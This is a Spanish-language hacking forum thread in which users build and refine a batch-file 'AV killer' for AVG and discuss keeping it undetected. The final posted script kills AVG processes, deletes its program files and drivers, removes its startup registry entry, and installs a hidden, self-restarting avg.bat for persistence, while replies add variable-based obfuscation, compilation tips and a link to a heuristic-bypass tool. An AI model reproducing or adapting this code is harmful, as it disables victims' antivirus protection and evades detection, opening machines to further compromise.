Que no detecten mi av-killer hecho en batch...

Iniciado por Carloswaldo, 10 Mayo 2008, 21:51 PM

0 Miembros y 3 Visitantes están viendo este tema.

Carloswaldo

Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:

set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%


Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?

Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...

Darioxhcx

set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

podrias probarlo asi tmb
saludos

Hendrix

Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián

Carloswaldo

Cita de: Darioxhcx en 13 Mayo 2008, 00:23 AM
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.

Cita de: Hendriҳ en 13 Mayo 2008, 00:28 AM
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)

Excelente, no lo había visto, lo estaré probando. Gracias :D

Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro :xD

MK-Ultra

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ

Carloswaldo

Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers.

Este es el código final:

::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit


Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo. ;D

Estaré buscando la forma de mejorar el código, e iré por el próximo av... ::)

$hyDow

no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%

digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...

$hyDow

Sai-To

bueno si no te quieres complicar la vida poniendo como un becerro:

set var=...............
...................

hay crearon una utilidad para separarlo asi... la postee yo de skull! ;) y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! ;)

$hyDow

hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi


$hyDow